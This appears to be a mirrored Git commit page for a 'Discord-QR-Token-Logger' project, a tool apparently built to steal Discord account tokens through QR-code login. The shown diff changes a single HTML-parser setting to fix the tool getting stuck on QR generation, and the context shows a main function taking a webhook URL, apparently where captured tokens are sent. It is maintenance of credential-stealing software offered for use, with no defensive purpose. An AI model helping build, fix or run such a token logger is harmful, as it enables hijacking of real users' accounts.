mirror of
https://github.com/9P9/Discord-QR-Token-Logger.git
synced 2025-07-30 14:28:13 +00:00
Merge pull request #47 from 9P9/46-stuck-on-generating-qr-code
updating parser
This commit is contained in:
commit
e517794aec
@ -69,7 +69,7 @@ def main(webhook_url: str) -> None:
|
|||||||
time.sleep(5)
|
time.sleep(5)
|
||||||
# number of issues.
|
# number of issues.
|
||||||
|
|
||||||
source = BeautifulSoup(main.driver.page_source, features='lxml')
|
source = BeautifulSoup(main.driver.page_source, features='html.parser')
|
||||||
|
|
||||||
qrg = QRGrabber('resources')
|
qrg = QRGrabber('resources')
|
||||||
|
|
||||||
|
Loading…
x
Reference in New Issue
Block a user